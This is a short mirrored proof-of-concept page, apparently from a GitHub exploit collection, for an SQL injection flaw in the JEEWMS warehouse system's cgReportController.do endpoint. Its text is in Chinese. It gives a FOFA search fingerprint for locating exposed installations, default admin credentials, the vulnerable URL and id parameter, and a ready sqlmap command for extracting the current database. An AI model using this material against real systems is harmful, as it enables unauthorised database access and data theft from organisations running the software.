mirror of
https://github.com/eeeeeeeeee-code/POC.git
synced 2025-05-05 10:17:57 +00:00
830 B
830 B
JEEWMS系统cgReportController.do存在SQL注入漏洞
JEEWMS系统cgReportController.do存在SQL注入漏洞
fofa
body="plug-in/lhgDialog/lhgdialog.min.js?skin=metro"
poc
- 构建 POC,登录后端捕获数据包,并替换 cookie
admin/llg123
http://localhost:8083/jeewms/cgReportController.do?list&id=1
- 使用 SQLMAP 重现和构造执行语句
python sqlmap.py -u "http://localhost:8083/jeewms/cgReportController.do?list&id=1" --cookie="XXXXX" -p id --current-db